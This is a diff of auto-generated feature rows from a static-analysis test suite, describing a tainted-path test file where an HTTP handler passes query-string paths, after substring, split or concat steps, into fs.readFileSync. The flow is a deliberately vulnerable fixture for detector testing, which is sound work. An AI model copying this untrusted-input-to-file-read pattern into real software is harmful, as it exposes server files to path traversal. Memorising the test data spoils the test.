autogenerated/TaintedPath/tainted-string-steps.js:7:5:7:16 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:7:5:7:16 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:7:5:7:16 | readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:7:18:7:21 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:7:18:7:21 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:7:18:7:21 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:7:18:7:21 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:7:18:7:21 | path | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:7:18:7:31 | path.substring | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:7:18:7:31 | path.substring | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:7:18:7:31 | path.substring | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:7:18:7:31 | path.substring | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:7:18:7:31 | path.substring | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:7:18:7:37 | exceptional return of path.substring(i, j) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:7:18:7:37 | exceptional return of path.substring(i, j) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:7:18:7:37 | exceptional return of path.substring(i, j) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:7:18:7:37 | exceptional return of path.substring(i, j) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:7:18:7:37 | exceptional return of path.substring(i, j) | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:7:18:7:37 | path.substring(i, j) | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/tainted-string-steps.js:7:18:7:37 | path.substring(i, j) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:7:18:7:37 | path.substring(i, j) | calleeImports | fs | @@ -11231,6 +86982,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:7:18:7:37 | path.substring(i, j) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:7:18:7:37 | path.substring(i, j) | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:7:18:7:37 | path.substring(i, j) | receiverName | fs | +| autogenerated/TaintedPath/tainted-string-steps.js:7:23:7:31 | substring | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:7:23:7:31 | substring | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:7:23:7:31 | substring | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:7:23:7:31 | substring | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:7:23:7:31 | substring | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:7:33:7:33 | i | CalleeFlexibleAccessPath | path.substring | | autogenerated/TaintedPath/tainted-string-steps.js:7:33:7:33 | i | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:7:33:7:33 | i | calleeImports | url | @@ -11249,6 +87005,46 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:7:36:7:36 | j | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:7:36:7:36 | j | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:7:36:7:36 | j | receiverName | path | +| autogenerated/TaintedPath/tainted-string-steps.js:8:2:8:3 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:8:2:8:3 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:8:2:8:3 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:8:2:8:3 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:8:2:8:3 | fs | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:8:2:8:16 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:8:2:8:16 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:8:2:8:16 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:8:2:8:16 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:8:2:8:16 | fs.readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:8:2:8:35 | exceptional return of fs.read ... ing(4)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:8:2:8:35 | exceptional return of fs.read ... ing(4)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:8:2:8:35 | exceptional return of fs.read ... ing(4)) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:8:2:8:35 | exceptional return of fs.read ... ing(4)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:8:2:8:35 | exceptional return of fs.read ... ing(4)) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:8:2:8:35 | fs.read ... ing(4)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:8:2:8:35 | fs.read ... ing(4)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:8:2:8:35 | fs.read ... ing(4)) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:8:2:8:35 | fs.read ... ing(4)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:8:2:8:35 | fs.read ... ing(4)) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:8:5:8:16 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:8:5:8:16 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:8:5:8:16 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:8:5:8:16 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:8:5:8:16 | readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:8:18:8:21 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:8:18:8:21 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:8:18:8:21 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:8:18:8:21 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:8:18:8:21 | path | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:8:18:8:31 | path.substring | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:8:18:8:31 | path.substring | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:8:18:8:31 | path.substring | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:8:18:8:31 | path.substring | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:8:18:8:31 | path.substring | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:8:18:8:34 | exceptional return of path.substring(4) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:8:18:8:34 | exceptional return of path.substring(4) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:8:18:8:34 | exceptional return of path.substring(4) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:8:18:8:34 | exceptional return of path.substring(4) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:8:18:8:34 | exceptional return of path.substring(4) | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:8:18:8:34 | path.substring(4) | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/tainted-string-steps.js:8:18:8:34 | path.substring(4) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:8:18:8:34 | path.substring(4) | calleeImports | fs | @@ -11258,6 +87054,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:8:18:8:34 | path.substring(4) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:8:18:8:34 | path.substring(4) | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:8:18:8:34 | path.substring(4) | receiverName | fs | +| autogenerated/TaintedPath/tainted-string-steps.js:8:23:8:31 | substring | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:8:23:8:31 | substring | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:8:23:8:31 | substring | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:8:23:8:31 | substring | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:8:23:8:31 | substring | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:8:33:8:33 | 4 | CalleeFlexibleAccessPath | path.substring | | autogenerated/TaintedPath/tainted-string-steps.js:8:33:8:33 | 4 | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:8:33:8:33 | 4 | calleeImports | url | @@ -11267,6 +87068,46 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:8:33:8:33 | 4 | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:8:33:8:33 | 4 | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:8:33:8:33 | 4 | receiverName | path | +| autogenerated/TaintedPath/tainted-string-steps.js:9:2:9:3 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:9:2:9:3 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:9:2:9:3 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:9:2:9:3 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:9:2:9:3 | fs | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:9:2:9:16 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:9:2:9:16 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:9:2:9:16 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:9:2:9:16 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:9:2:9:16 | fs.readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:9:2:9:38 | exceptional return of fs.read ... (0, i)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:9:2:9:38 | exceptional return of fs.read ... (0, i)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:9:2:9:38 | exceptional return of fs.read ... (0, i)) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:9:2:9:38 | exceptional return of fs.read ... (0, i)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:9:2:9:38 | exceptional return of fs.read ... (0, i)) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:9:2:9:38 | fs.read ... (0, i)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:9:2:9:38 | fs.read ... (0, i)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:9:2:9:38 | fs.read ... (0, i)) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:9:2:9:38 | fs.read ... (0, i)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:9:2:9:38 | fs.read ... (0, i)) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:9:5:9:16 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:9:5:9:16 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:9:5:9:16 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:9:5:9:16 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:9:5:9:16 | readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:9:18:9:21 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:9:18:9:21 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:9:18:9:21 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:9:18:9:21 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:9:18:9:21 | path | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:9:18:9:31 | path.substring | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:9:18:9:31 | path.substring | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:9:18:9:31 | path.substring | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:9:18:9:31 | path.substring | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:9:18:9:31 | path.substring | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:9:18:9:37 | exceptional return of path.substring(0, i) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:9:18:9:37 | exceptional return of path.substring(0, i) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:9:18:9:37 | exceptional return of path.substring(0, i) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:9:18:9:37 | exceptional return of path.substring(0, i) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:9:18:9:37 | exceptional return of path.substring(0, i) | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | calleeImports | fs | @@ -11276,6 +87117,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | receiverName | fs | +| autogenerated/TaintedPath/tainted-string-steps.js:9:23:9:31 | substring | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:9:23:9:31 | substring | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:9:23:9:31 | substring | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:9:23:9:31 | substring | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:9:23:9:31 | substring | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:9:33:9:33 | 0 | CalleeFlexibleAccessPath | path.substring | | autogenerated/TaintedPath/tainted-string-steps.js:9:33:9:33 | 0 | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:9:33:9:33 | 0 | calleeImports | url | @@ -11294,6 +87140,46 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:9:36:9:36 | i | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:9:36:9:36 | i | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:9:36:9:36 | i | receiverName | path | +| autogenerated/TaintedPath/tainted-string-steps.js:10:2:10:3 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:10:2:10:3 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:10:2:10:3 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim 